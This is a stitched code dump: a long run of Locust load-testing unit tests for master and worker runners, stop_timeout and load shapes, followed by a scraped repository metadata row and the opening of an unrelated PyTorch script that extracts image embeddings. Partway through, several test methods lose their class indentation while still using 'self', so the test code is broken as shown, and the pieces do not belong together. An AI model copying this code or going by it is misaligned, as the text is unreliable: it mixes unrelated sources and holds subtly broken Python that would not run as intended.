            server.mocked_send(Message("client_ready", None, "fake_client"))
            stats = RequestStats()
            stats.log_request("GET", "/1", 100, 3546)
            stats.log_request("GET", "/1", 800, 56743)
            stats.log_request("GET", "/1", None, 56743)
            stats2 = RequestStats()
            stats2.log_request("GET", "/2", 700, 2201)
            stats2.log_request("GET", "/2", None, 2201)
            stats3 = RequestStats()
            stats3.log_request("GET", "/3", None, 2201)
            server.mocked_send(
                Message(
                    "stats",
                    {
                        "stats": stats.serialize_stats(),
                        "stats_total": stats.total.serialize(),
                        "errors": stats.serialize_errors(),
                        "user_count": 1,
                    },
                    "fake_client",
                )
            )
            server.mocked_send(
                Message(
                    "stats",
                    {
                        "stats": stats2.serialize_stats(),
                        "stats_total": stats2.total.serialize(),
                        "errors": stats2.serialize_errors(),
                        "user_count": 2,
                    },
                    "fake_client",
                )
            )
            server.mocked_send(
                Message(
                    "stats",
                    {
                        "stats": stats3.serialize_stats(),
                        "stats_total": stats3.total.serialize(),
                        "errors": stats3.serialize_errors(),
                        "user_count": 2,
                    },
                    "fake_client",
                )
            )
            # median over the non-None samples [100, 800, 700] is 700
            self.assertEqual(700, master.stats.total.median_response_time)
    def test_master_current_response_times(self):
        """Current response-time percentiles use only the recent sliding window."""
        start_time = 1
        # freeze time so the sliding window boundaries are deterministic
        with mock.patch("time.time") as mocked_time:
            mocked_time.return_value = start_time
            with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
                master = self.get_runner()
                self.environment.stats.reset_all()
                mocked_time.return_value += 1.0234
                server.mocked_send(Message("client_ready", None, "fake_client"))
                stats = RequestStats()
                stats.log_request("GET", "/1", 100, 3546)
                stats.log_request("GET", "/1", 800, 56743)
                server.mocked_send(
                    Message(
                        "stats",
                        {
                            "stats": stats.serialize_stats(),
                            "stats_total": stats.total.get_stripped_report(),
                            "errors": stats.serialize_errors(),
                            "user_count": 1,
                        },
                        "fake_client",
                    )
                )
                mocked_time.return_value += 1
                stats2 = RequestStats()
                stats2.log_request("GET", "/2", 400, 2201)
                server.mocked_send(
                    Message(
                        "stats",
                        {
                            "stats": stats2.serialize_stats(),
                            "stats_total": stats2.total.get_stripped_report(),
                            "errors": stats2.serialize_errors(),
                            "user_count": 2,
                        },
                        "fake_client",
                    )
                )
                mocked_time.return_value += 4
                self.assertEqual(400, master.stats.total.get_current_response_time_percentile(0.5))
                self.assertEqual(800, master.stats.total.get_current_response_time_percentile(0.95))
                # let 10 second pass, do some more requests, send it to the master and make
                # sure the current response time percentiles only accounts for these new requests
                mocked_time.return_value += 10.10023
                stats.log_request("GET", "/1", 20, 1)
                stats.log_request("GET", "/1", 30, 1)
                stats.log_request("GET", "/1", 3000, 1)
                server.mocked_send(
                    Message(
                        "stats",
                        {
                            "stats": stats.serialize_stats(),
                            "stats_total": stats.total.get_stripped_report(),
                            "errors": stats.serialize_errors(),
                            "user_count": 2,
                        },
                        "fake_client",
                    )
                )
                self.assertEqual(30, master.stats.total.get_current_response_time_percentile(0.5))
                self.assertEqual(3000, master.stats.total.get_current_response_time_percentile(0.95))
    def test_rebalance_locust_users_on_worker_connect(self):
        """Users are redistributed across workers when a new worker connects mid-test."""
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            server.mocked_send(Message("client_ready", None, "zeh_fake_client1"))
            self.assertEqual(1, len(master.clients))
            self.assertTrue(
                "zeh_fake_client1" in master.clients, "Could not find fake client in master instance's clients dict"
            )
            master.start(100, 20)
            self.assertEqual(1, len(server.outbox))
            client_id, msg = server.outbox.pop()
            # single worker receives the full allocation
            self.assertEqual(100, msg.data["num_users"])
            self.assertEqual(20, msg.data["spawn_rate"])
            # let another worker connect
            server.mocked_send(Message("client_ready", None, "zeh_fake_client2"))
            self.assertEqual(2, len(master.clients))
            self.assertEqual(2, len(server.outbox))
            # both workers now get half the users and half the spawn rate
            client_id, msg = server.outbox.pop()
            self.assertEqual(50, msg.data["num_users"])
            self.assertEqual(10, msg.data["spawn_rate"])
            client_id, msg = server.outbox.pop()
            self.assertEqual(50, msg.data["num_users"])
            self.assertEqual(10, msg.data["spawn_rate"])
    def test_sends_spawn_data_to_ready_running_spawning_workers(self):
        """Sends spawn job to running, ready, or spawning workers"""
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            master.clients[1] = WorkerNode(1)
            master.clients[2] = WorkerNode(2)
            master.clients[3] = WorkerNode(3)
            master.clients[1].state = STATE_INIT
            master.clients[2].state = STATE_SPAWNING
            master.clients[3].state = STATE_RUNNING
            master.start(user_count=5, spawn_rate=5)
            # one spawn message per worker, regardless of its (non-missing) state
            self.assertEqual(3, len(server.outbox))
    def test_start_event(self):
        """
        Tests that test_start event is fired
        """
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            run_count = [0]
            @self.environment.events.test_start.add_listener
            def on_test_start(*a, **kw):
                run_count[0] += 1
            for i in range(5):
                server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
            master.start(7, 7)
            self.assertEqual(5, len(server.outbox))
            self.assertEqual(1, run_count[0])
            # change number of users and check that test_start isn't fired again
            master.start(7, 7)
            self.assertEqual(1, run_count[0])
            # stop and start to make sure test_start is fired again
            master.stop()
            master.start(3, 3)
            self.assertEqual(2, run_count[0])
            master.quit()
    def test_stop_event(self):
        """
        Tests that test_stop event is fired
        """
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            run_count = [0]
            @self.environment.events.test_stop.add_listener
            def on_test_stop(*a, **kw):
                run_count[0] += 1
            for i in range(5):
                server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
            master.start(7, 7)
            self.assertEqual(5, len(server.outbox))
            master.stop()
            self.assertEqual(1, run_count[0])
            # restart the test and check stop (via quit) fires exactly once more
            run_count[0] = 0
            for i in range(5):
                server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
            master.start(7, 7)
            master.stop()
            master.quit()
            self.assertEqual(1, run_count[0])
    def test_stop_event_quit(self):
        """
        Tests that test_stop event is fired when quit() is called directly
        """
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            run_count = [0]
            @self.environment.events.test_stop.add_listener
            def on_test_stop(*a, **kw):
                run_count[0] += 1
            for i in range(5):
                server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
            master.start(7, 7)
            self.assertEqual(5, len(server.outbox))
            master.quit()
            self.assertEqual(1, run_count[0])
    def test_spawn_zero_locusts(self):
        """Starting with user_count=0 must not spawn anyone (and must return)."""
        class MyTaskSet(TaskSet):
            @task
            def my_task(self):
                pass
        class MyTestUser(User):
            tasks = [MyTaskSet]
            wait_time = constant(0.1)
        environment = Environment(user_classes=[MyTestUser])
        runner = LocalRunner(environment)
        # bound the wait — a spawned user would keep the greenlet alive
        timeout = gevent.Timeout(2.0)
        timeout.start()
        try:
            runner.start(0, 1, wait=True)
            runner.spawning_greenlet.join()
        except gevent.Timeout:
            self.fail("Got Timeout exception. A locust seems to have been spawned, even though 0 was specified.")
        finally:
            timeout.cancel()
    def test_spawn_uneven_locusts(self):
        """
        Tests that we can accurately spawn a certain number of locusts, even if it's not an
        even number of the connected workers
        """
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            for i in range(5):
                server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
            master.start(7, 7)
            self.assertEqual(5, len(server.outbox))
            # sum the per-worker allocations from the outgoing spawn messages
            num_users = 0
            for _, msg in server.outbox:
                num_users += msg.data["num_users"]
            self.assertEqual(7, num_users, "Total number of locusts that would have been spawned is not 7")
    def test_spawn_fewer_locusts_than_workers(self):
        """Spawning fewer users than workers still sums to the requested total."""
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            for i in range(5):
                server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
            master.start(2, 2)
            self.assertEqual(5, len(server.outbox))
            # sum the per-worker allocations from the outgoing spawn messages
            num_users = 0
            for _, msg in server.outbox:
                num_users += msg.data["num_users"]
            self.assertEqual(2, num_users, "Total number of locusts that would have been spawned is not 2")
    def test_custom_shape_scale_up(self):
        """A LoadTestShape that scales up drives user counts and the final stop."""
        class MyUser(User):
            @task
            def my_task(self):
                pass
        class TestShape(LoadTestShape):
            def tick(self):
                # two stages (1 then 2 users), then stop
                run_time = self.get_run_time()
                if run_time < 2:
                    return (1, 1)
                elif run_time < 4:
                    return (2, 2)
                else:
                    return None
        self.environment.user_classes = [MyUser]
        self.environment.shape_class = TestShape()
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            for i in range(5):
                server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
            # Start the shape_worker
            self.environment.shape_class.reset_time()
            master.start_shape()
            sleep(0.5)
            # Wait for shape_worker to update user_count
            num_users = 0
            for _, msg in server.outbox:
                if msg.data:
                    num_users += msg.data["num_users"]
            self.assertEqual(
                1, num_users, "Total number of users in first stage of shape test is not 1: %i" % num_users
            )
            # Wait for shape_worker to update user_count again
            sleep(2)
            num_users = 0
            for _, msg in server.outbox:
                if msg.data:
                    num_users += msg.data["num_users"]
            self.assertEqual(
                3, num_users, "Total number of users in second stage of shape test is not 3: %i" % num_users
            )
            # Wait to ensure shape_worker has stopped the test
            sleep(3)
            self.assertEqual("stopped", master.state, "The test has not been stopped by the shape class")
def test_custom_shape_scale_down(self):
    """A LoadTestShape that ramps down (5 users, then -4/4) drives the
    master; verify the aggregated spawn counts and the final stop."""
    class MyUser(User):
        @task
        def my_task(self):
            pass

    class TestShape(LoadTestShape):
        def tick(self):
            # Stage 1 for the first 2s, stage 2 until 4s, then stop.
            run_time = self.get_run_time()
            if run_time < 2:
                return (5, 5)
            elif run_time < 4:
                return (-4, 4)
            else:
                return None

    self.environment.user_classes = [MyUser]
    self.environment.shape_class = TestShape()
    with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
        master = self.get_runner()
        for i in range(5):
            server.mocked_send(Message("client_ready", None, "fake_client%i" % i))
        # Start the shape_worker
        self.environment.shape_class.reset_time()
        master.start_shape()
        sleep(0.5)
        # Wait for shape_worker to update user_count
        num_users = 0
        for _, msg in server.outbox:
            if msg.data:
                num_users += msg.data["num_users"]
        self.assertEqual(
            5, num_users, "Total number of users in first stage of shape test is not 5: %i" % num_users
        )
        # Wait for shape_worker to update user_count again
        sleep(2)
        # Counts accumulate: 5 + (-4) = 1 across both stages.
        num_users = 0
        for _, msg in server.outbox:
            if msg.data:
                num_users += msg.data["num_users"]
        self.assertEqual(
            1, num_users, "Total number of users in second stage of shape test is not 1: %i" % num_users
        )
        # Wait to ensure shape_worker has stopped the test
        sleep(3)
        self.assertEqual("stopped", master.state, "The test has not been stopped by the shape class")
def test_exception_in_task(self):
    """Exceptions raised by a task propagate from User.run and are
    aggregated by the runner: two identical failures make one entry
    with count == 2."""
    class MyUser(User):
        @task
        def will_error(self):
            raise HeyAnException(":(")

    self.environment.user_classes = [MyUser]
    runner = self.environment.create_local_runner()

    l = MyUser(self.environment)
    self.assertRaises(HeyAnException, l.run)
    self.assertRaises(HeyAnException, l.run)

    # Same traceback twice -> a single deduplicated entry with count 2.
    self.assertEqual(1, len(runner.exceptions))
    hash_key, exception = runner.exceptions.popitem()
    self.assertTrue("traceback" in exception)
    self.assertTrue("HeyAnException" in exception["traceback"])
    self.assertEqual(2, exception["count"])
def test_exception_is_caught(self):
    """Test that exceptions are stored, and execution continues"""
    class MyTaskSet(TaskSet):
        def __init__(self, *a, **kw):
            super().__init__(*a, **kw)
            # Deterministic task order: raise first, then stop the user.
            self._task_queue = [self.will_error, self.will_stop]

        @task(1)
        def will_error(self):
            raise HeyAnException(":(")

        @task(1)
        def will_stop(self):
            raise StopUser()

    class MyUser(User):
        wait_time = constant(0.01)
        tasks = [MyTaskSet]

    # set config to catch exceptions in locust users
    self.environment.catch_exceptions = True
    self.environment.user_classes = [MyUser]
    runner = LocalRunner(self.environment)
    l = MyUser(self.environment)

    # make sure HeyAnException isn't raised
    l.run()
    l.run()
    # make sure we got two entries in the error log
    self.assertEqual(2, len(self.mocked_log.error))

    # make sure exception was stored (deduplicated, counted twice)
    self.assertEqual(1, len(runner.exceptions))
    hash_key, exception = runner.exceptions.popitem()
    self.assertTrue("traceback" in exception)
    self.assertTrue("HeyAnException" in exception["traceback"])
    self.assertEqual(2, exception["count"])
def test_master_reset_connection(self):
    """Test that connection will be reset when network issues found"""
    with mock.patch("locust.runners.FALLBACK_INTERVAL", new=0.1):
        with mock.patch("locust.rpc.rpc.Server", mocked_rpc()) as server:
            master = self.get_runner()
            self.assertEqual(0, len(master.clients))
            # A broken "client_ready" marks the connection as broken.
            server.mocked_send(Message("client_ready", NETWORK_BROKEN, "fake_client"))
            self.assertTrue(master.connection_broken)
            # A healthy message restores it and registers the worker.
            server.mocked_send(Message("client_ready", None, "fake_client"))
            sleep(0.2)
            self.assertFalse(master.connection_broken)
            self.assertEqual(1, len(master.clients))
            master.quit()
class TestWorkerRunner(LocustTestCase):
    """Tests for WorkerRunner driven through a mocked RPC client."""

    def setUp(self):
        super().setUp()
        # self._report_to_master_event_handlers = [h for h in events.report_to_master._handlers]

    def tearDown(self):
        # events.report_to_master._handlers = self._report_to_master_event_handlers
        super().tearDown()

    def get_runner(self, environment=None, user_classes=None):
        """Build a WorkerRunner against ``environment`` (defaults to the
        test case's environment) with the given user classes.

        Fix: the default for ``user_classes`` was a mutable ``[]``
        (shared across calls); use None-sentinel instead.
        """
        if environment is None:
            environment = self.environment
        environment.user_classes = user_classes if user_classes is not None else []
        return WorkerRunner(environment, master_host="localhost", master_port=5557)

    def test_worker_stop_timeout(self):
        """With a stop_timeout, a stopped worker lets running users finish
        their task; test_start must never fire on the worker."""
        class MyTestUser(User):
            _test_state = 0

            @task
            def the_task(self):
                MyTestUser._test_state = 1
                gevent.sleep(0.2)
                MyTestUser._test_state = 2

        with mock.patch("locust.rpc.rpc.Client", mocked_rpc()) as client:
            environment = Environment()
            test_start_run = [False]

            @environment.events.test_start.add_listener
            def on_test_start(_environment, **kw):
                test_start_run[0] = True

            worker = self.get_runner(environment=environment, user_classes=[MyTestUser])
            self.assertEqual(1, len(client.outbox))
            self.assertEqual("client_ready", client.outbox[0].type)
            client.mocked_send(
                Message(
                    "spawn",
                    {
                        "spawn_rate": 1,
                        "num_users": 1,
                        "host": "",
                        "stop_timeout": 1,
                    },
                    "dummy_client_id",
                )
            )
            # wait for worker to spawn locusts
            self.assertIn("spawning", [m.type for m in client.outbox])
            worker.spawning_greenlet.join()
            self.assertEqual(1, len(worker.user_greenlets))
            # check that locust has started running
            gevent.sleep(0.01)
            self.assertEqual(1, MyTestUser._test_state)
            # send stop message
            client.mocked_send(Message("stop", None, "dummy_client_id"))
            worker.user_greenlets.join()
            # check that locust user got to finish
            self.assertEqual(2, MyTestUser._test_state)
            # make sure the test_start was never fired on the worker
            self.assertFalse(test_start_run[0])

    def test_worker_without_stop_timeout(self):
        """Without a stop_timeout, stopping the worker kills users
        immediately, mid-task."""
        class MyTestUser(User):
            _test_state = 0

            @task
            def the_task(self):
                MyTestUser._test_state = 1
                gevent.sleep(0.2)
                MyTestUser._test_state = 2

        with mock.patch("locust.rpc.rpc.Client", mocked_rpc()) as client:
            environment = Environment(stop_timeout=None)
            worker = self.get_runner(environment=environment, user_classes=[MyTestUser])
            self.assertEqual(1, len(client.outbox))
            self.assertEqual("client_ready", client.outbox[0].type)
            client.mocked_send(
                Message(
                    "spawn",
                    {
                        "spawn_rate": 1,
                        "num_users": 1,
                        "host": "",
                        "stop_timeout": None,
                    },
                    "dummy_client_id",
                )
            )
            # wait for worker to spawn locusts
            self.assertIn("spawning", [m.type for m in client.outbox])
            worker.spawning_greenlet.join()
            self.assertEqual(1, len(worker.user_greenlets))
            # check that locust has started running
            gevent.sleep(0.01)
            self.assertEqual(1, MyTestUser._test_state)
            # send stop message
            client.mocked_send(Message("stop", None, "dummy_client_id"))
            worker.user_greenlets.join()
            # check that locust user did not get to finish
            self.assertEqual(1, MyTestUser._test_state)

    def test_change_user_count_during_spawning(self):
        """A second spawn message arriving mid-spawn re-targets the worker
        to the new user count (9 instead of 10)."""
        class MyUser(User):
            wait_time = constant(1)

            @task
            def my_task(self):
                pass

        with mock.patch("locust.rpc.rpc.Client", mocked_rpc()) as client:
            environment = Environment()
            worker = self.get_runner(environment=environment, user_classes=[MyUser])
            client.mocked_send(
                Message(
                    "spawn",
                    {
                        "spawn_rate": 5,
                        "num_users": 10,
                        "host": "",
                        "stop_timeout": None,
                    },
                    "dummy_client_id",
                )
            )
            sleep(0.6)
            self.assertEqual(STATE_SPAWNING, worker.state)
            client.mocked_send(
                Message(
                    "spawn",
                    {
                        "spawn_rate": 5,
                        "num_users": 9,
                        "host": "",
                        "stop_timeout": None,
                    },
                    "dummy_client_id",
                )
            )
            sleep(0)
            worker.spawning_greenlet.join()
            self.assertEqual(9, len(worker.user_greenlets))
            worker.quit()
class TestMessageSerializing(unittest.TestCase):
    """Round-trip checks for the RPC Message wire format."""

    def test_message_serialize(self):
        """A serialized Message must deserialize to an equal message."""
        original = Message("client_ready", None, "my_id")
        rebuilt = Message.unserialize(original.serialize())
        # Compare each transported attribute individually.
        for attribute in ("type", "data", "node_id"):
            self.assertEqual(getattr(original, attribute), getattr(rebuilt, attribute))
class TestStopTimeout(LocustTestCase):
    """Behavior of the runner's ``stop_timeout`` grace period: how far a
    running task may progress before the runner forcibly kills users."""

    def test_stop_timeout(self):
        """Task progress is bounded by stop_timeout: no timeout stops at
        "first", a short timeout reaches "second", a generous one "third"."""
        short_time = 0.05

        class MyTaskSet(TaskSet):
            @task
            def my_task(self):
                MyTaskSet.state = "first"
                gevent.sleep(short_time)
                MyTaskSet.state = "second"  # should only run when run time + stop_timeout is > short_time
                gevent.sleep(short_time)
                MyTaskSet.state = "third"  # should only run when run time + stop_timeout is > short_time * 2

        class MyTestUser(User):
            tasks = [MyTaskSet]

        environment = Environment(user_classes=[MyTestUser])
        runner = environment.create_local_runner()
        runner.start(1, 1, wait=False)
        gevent.sleep(short_time / 2)
        runner.quit()
        self.assertEqual("first", MyTaskSet.state)

        # exit with timeout
        environment = Environment(user_classes=[MyTestUser], stop_timeout=short_time / 2)
        runner = environment.create_local_runner()
        runner.start(1, 1, wait=False)
        gevent.sleep(short_time)
        runner.quit()
        self.assertEqual("second", MyTaskSet.state)

        # allow task iteration to complete, with some margin
        environment = Environment(user_classes=[MyTestUser], stop_timeout=short_time * 3)
        runner = environment.create_local_runner()
        runner.start(1, 1, wait=False)
        gevent.sleep(short_time)
        timeout = gevent.Timeout(short_time * 2)
        timeout.start()
        try:
            runner.quit()
            runner.greenlet.join()
        except gevent.Timeout:
            self.fail("Got Timeout exception. Some locusts must have kept running after iteration finish")
        finally:
            timeout.cancel()
        self.assertEqual("third", MyTaskSet.state)

    def test_stop_timeout_during_on_start(self):
        """Stopping while on_start runs lets on_start finish but prevents
        the first task from executing."""
        short_time = 0.05

        class MyTaskSet(TaskSet):
            finished_on_start = False
            my_task_run = False

            def on_start(self):
                gevent.sleep(short_time)
                MyTaskSet.finished_on_start = True

            @task
            def my_task(self):
                MyTaskSet.my_task_run = True

        class MyTestUser(User):
            tasks = [MyTaskSet]

        environment = create_environment([MyTestUser], mocked_options())
        environment.stop_timeout = short_time
        runner = environment.create_local_runner()
        runner.start(1, 1)
        gevent.sleep(short_time / 2)
        runner.quit()

        self.assertTrue(MyTaskSet.finished_on_start)
        self.assertFalse(MyTaskSet.my_task_run)

    def test_stop_timeout_exit_during_wait(self):
        """Users sitting in wait_time must stop immediately, not after
        stop_timeout elapses."""
        short_time = 0.05

        class MyTaskSet(TaskSet):
            @task
            def my_task(self):
                pass

        class MyTestUser(User):
            tasks = [MyTaskSet]
            wait_time = constant(1)

        environment = Environment(user_classes=[MyTestUser], stop_timeout=short_time)
        runner = environment.create_local_runner()
        runner.start(1, 1)
        gevent.sleep(short_time)  # sleep to make sure locust has had time to start waiting
        timeout = gevent.Timeout(short_time)
        timeout.start()
        try:
            runner.quit()
            runner.greenlet.join()
        except gevent.Timeout:
            self.fail("Got Timeout exception. Waiting locusts should stop immediately, even when using stop_timeout.")
        finally:
            timeout.cancel()

    def test_stop_timeout_with_interrupt(self):
        """A TaskSet that interrupts with reschedule=True exits immediately
        on stop, even with a stop_timeout set."""
        short_time = 0.05

        class MySubTaskSet(TaskSet):
            @task
            def a_task(self):
                gevent.sleep(0)
                self.interrupt(reschedule=True)

        class MyTaskSet(TaskSet):
            tasks = [MySubTaskSet]

        class MyTestUser(User):
            tasks = [MyTaskSet]

        environment = create_environment([MyTestUser], mocked_options())
        environment.stop_timeout = short_time
        runner = environment.create_local_runner()
        runner.start(1, 1, wait=True)
        gevent.sleep(0)
        timeout = gevent.Timeout(short_time)
        timeout.start()
        try:
            runner.quit()
            runner.greenlet.join()
        except gevent.Timeout:
            self.fail("Got Timeout exception. Interrupted locusts should exit immediately during stop_timeout.")
        finally:
            timeout.cancel()

    def test_stop_timeout_with_interrupt_no_reschedule(self):
        """Interrupt with reschedule=False during stop: the in-flight task
        completes (state becomes 1) and the user exits promptly."""
        state = [0]

        class MySubTaskSet(TaskSet):
            @task
            def a_task(self):
                gevent.sleep(0.1)
                state[0] = 1
                self.interrupt(reschedule=False)

        class MyTestUser(User):
            tasks = [MySubTaskSet]
            wait_time = constant(3)

        environment = create_environment([MyTestUser], mocked_options())
        environment.stop_timeout = 0.3
        runner = environment.create_local_runner()
        runner.start(1, 1, wait=True)
        gevent.sleep(0)
        timeout = gevent.Timeout(0.11)
        timeout.start()
        try:
            runner.quit()
            runner.greenlet.join()
        except gevent.Timeout:
            self.fail("Got Timeout exception. Interrupted locusts should exit immediately during stop_timeout.")
        finally:
            timeout.cancel()
        self.assertEqual(1, state[0])

    def test_kill_locusts_with_stop_timeout(self):
        """stop_users() honors stop_timeout the same way quit() does, for
        each of the three timeout configurations."""
        short_time = 0.05

        class MyTaskSet(TaskSet):
            @task
            def my_task(self):
                MyTaskSet.state = "first"
                gevent.sleep(short_time)
                MyTaskSet.state = "second"  # should only run when run time + stop_timeout is > short_time
                gevent.sleep(short_time)
                MyTaskSet.state = "third"  # should only run when run time + stop_timeout is > short_time * 2

        class MyTestUser(User):
            tasks = [MyTaskSet]

        environment = create_environment([MyTestUser], mocked_options())
        runner = environment.create_local_runner()
        runner.start(1, 1)
        gevent.sleep(short_time / 2)
        runner.stop_users(1)
        self.assertEqual("first", MyTaskSet.state)
        runner.quit()
        environment.runner = None

        environment.stop_timeout = short_time / 2  # exit with timeout
        runner = environment.create_local_runner()
        runner.start(1, 1)
        gevent.sleep(short_time)
        runner.stop_users(1)
        self.assertEqual("second", MyTaskSet.state)
        runner.quit()
        environment.runner = None

        environment.stop_timeout = short_time * 3  # allow task iteration to complete, with some margin
        runner = environment.create_local_runner()
        runner.start(1, 1)
        gevent.sleep(short_time)
        timeout = gevent.Timeout(short_time * 2)
        timeout.start()
        try:
            runner.stop_users(1)
            runner.user_greenlets.join()
        except gevent.Timeout:
            self.fail("Got Timeout exception. Some locusts must have kept running after iteration finish")
        finally:
            timeout.cancel()
        self.assertEqual("third", MyTaskSet.state)

    def test_users_can_call_runner_quit_with_stop_timeout(self):
        """A user calling runner.quit() from inside a task must not hang
        the runner, even with stop_timeout set."""
        class BaseUser(User):
            wait_time = constant(1)

            @task
            def trigger(self):
                self.environment.runner.quit()

        runner = Environment(user_classes=[BaseUser]).create_local_runner()
        runner.environment.stop_timeout = 1
        runner.spawn_users(1, 1, wait=False)
        timeout = gevent.Timeout(0.5)
        timeout.start()
        try:
            runner.greenlet.join()
        except gevent.Timeout:
            self.fail("Got Timeout exception, runner must have hung somehow.")
        finally:
            timeout.cancel()

    def test_gracefully_handle_exceptions_in_listener(self):
        """A raising test_stop listener must not prevent other listeners
        from running (both OK listeners still fire)."""
        class MyUser(User):
            wait_time = constant(1)

            @task
            def my_task(self):
                pass

        test_stop_run = [0]
        environment = Environment(user_classes=[User])

        def on_test_stop_ok(*args, **kwargs):
            test_stop_run[0] += 1

        def on_test_stop_fail(*args, **kwargs):
            assert 0

        environment.events.test_stop.add_listener(on_test_stop_ok)
        environment.events.test_stop.add_listener(on_test_stop_fail)
        environment.events.test_stop.add_listener(on_test_stop_ok)

        runner = LocalRunner(environment)
        runner.start(user_count=3, spawn_rate=3, wait=False)
        self.assertEqual(0, test_stop_run[0])
        runner.stop()
        self.assertEqual(2, test_stop_run[0])

    def test_stop_timeout_with_ramp_down(self):
        """Ramping down from 10 to 2 users with stop_timeout=2 decreases
        the user count gradually, not instantaneously."""
        class MyTaskSet(TaskSet):
            @task
            def my_task(self):
                gevent.sleep(1)

        class MyTestUser(User):
            tasks = [MyTaskSet]

        environment = Environment(user_classes=[MyTestUser], stop_timeout=2)
        runner = environment.create_local_runner()

        # Start load test, wait for users to start, then trigger ramp down
        runner.start(10, 10, wait=False)
        sleep(1)
        runner.start(2, 4, wait=False)

        # Wait a moment and then ensure the user count has started to drop but
        # not immediately to user_count
        sleep(1.1)
        user_count = len(runner.user_greenlets)
        self.assertTrue(user_count > 5, "User count has decreased too quickly: %i" % user_count)
        self.assertTrue(user_count < 10, "User count has not decreased at all: %i" % user_count)

        # Wait and ensure load test users eventually dropped to desired count
        sleep(2)
        user_count = len(runner.user_greenlets)
        self.assertTrue(user_count == 2, "User count has not decreased correctly to 2, it is : %i" % user_count)
| [
"huiren16@gmail.com"
] | huiren16@gmail.com |
dbcece8b142ebd4d2acf78f79ac9e5a07c15cad7 | 4aadd3b54d847559948ad736420ee4313dd2d2a9 | /main.py | beac7dbd881da4296ca003c00e95fc06a50e0def | [] | no_license | Xingxu1996/ADML | 339186616ce247083f500bdd7dba9550eb057ca7 | f0aefd91c4e26a3f59b665917bc2a43b06161582 | refs/heads/main | 2023-04-30T13:14:47.805896 | 2021-05-15T06:14:15 | 2021-05-15T06:14:15 | 367,554,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,753 | py | import scipy.io as io
import torch
import torchvision
import os
from sklearn.metrics import confusion_matrix
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
from torch.optim import lr_scheduler
import torch.optim as optim
from torch.autograd import Variable
from mtrainer import *
import numpy as np
from datahd import *
cuda = torch.cuda.is_available()
from datasets import BalancedBatchSampler
import matplotlib
import matplotlib.pyplot as plt
#from torchvision.datasets import MNIST
from torchvision import transforms
from networks import *
mean, std = 0.1307, 0.3081
import torch.nn as nn
#from resnet import *
# from inception_v3 import *
from resnet import *
from googlenet import *
#from old_losses import TripletLoss, Accuracy, OnlineTripletLoss
from w_losses import *
#from oldutils import *
from w_utils import *
from w_mtrainer import *
from datasets import BalancedBatchSampler
from metrics import AccumulatedAccuracyMetric, AverageNonzeroTripletsMetric
from googlenet import *
# cmats=[]
# accuracy=[]
def extract_embeddings(dataloader, model, name, dim=544):
    """Run ``model`` over every batch of ``dataloader``, collect the first
    output of ``model.forward`` as embeddings, and save them to a .mat file.

    Parameters
    ----------
    dataloader: torch.utils.data.DataLoader
        Loader yielding (images, target) batches.
    model: torch.nn.Module
        Model whose ``forward(images)[0]`` is a (batch, dim) embedding.
    name: str
        Output path for the MATLAB file (saved under key 'data').
    dim: int, default: 544
        Embedding dimensionality (previously hard-coded to 544).

    Returns
    -------
    (np.ndarray, np.ndarray)
        Embeddings of shape (N, dim) and labels of shape (N,).
    """
    with torch.no_grad():
        model.eval()
        n = len(dataloader.dataset)
        embeddings = np.zeros((n, dim))
        labels = np.zeros(n)
        # Run batches on whatever device the model lives on, instead of
        # relying on the module-level `cuda` global.
        try:
            device = next(model.parameters()).device
        except StopIteration:
            device = torch.device("cpu")
        k = 0
        for images, target in dataloader:
            images = images.to(device)
            batch_size = len(images)
            embeddings[k:k + batch_size] = model.forward(images)[0].data.cpu().numpy()
            labels[k:k + batch_size] = target.numpy()
            k += batch_size
    io.savemat(name, {'data': embeddings})
    return embeddings, labels
def extract_embeddingstest(dataloader, model, out_path="newours_0.1_0.9_test.txt", dim=2048):
    """Extract test-set embeddings and write them to a text file.

    Fixes: ``np.zros`` typo (AttributeError at runtime) -> ``np.zeros``;
    removed a leaked, unused file handle (``open(..., 'a')`` whose result
    was never written to or closed — ``np.savetxt`` opens the file itself).

    Parameters
    ----------
    dataloader: torch.utils.data.DataLoader
        Loader yielding (images, target) batches.
    model: torch.nn.Module
        Model whose ``forward(images)[0]`` is a (batch, dim) embedding.
    out_path: str, default: "newours_0.1_0.9_test.txt"
        Destination for ``np.savetxt`` (previously hard-coded).
    dim: int, default: 2048
        Embedding dimensionality (previously hard-coded to 2048).

    Returns
    -------
    (np.ndarray, np.ndarray)
        Embeddings of shape (N, dim) and labels of shape (N,).
    """
    with torch.no_grad():
        model.eval()
        n = len(dataloader.dataset)
        embeddings = np.zeros((n, dim))
        labels = np.zeros(n)
        # Use the model's device instead of the module-level `cuda` global.
        try:
            device = next(model.parameters()).device
        except StopIteration:
            device = torch.device("cpu")
        k = 0
        for images, target in dataloader:
            images = images.to(device)
            batch_size = len(images)
            embeddings[k:k + batch_size] = model.forward(images)[0].data.cpu().numpy()
            labels[k:k + batch_size] = target.numpy()
            k += batch_size
    np.savetxt(out_path, embeddings)
    return embeddings, labels
# ---------------------------------------------------------------------------
# Training entry point: builds an Inception-v3 embedding network, loads the
# FI benchmark split from hard-coded absolute paths, and trains with a
# combined online-triplet + cross-entropy objective.
# NOTE(review): dataset paths are machine-specific; parameterize before reuse.
# ---------------------------------------------------------------------------
embedding_net = Inception3()
# embedding_net = ResNet()
# embedding_net = inception_v3()
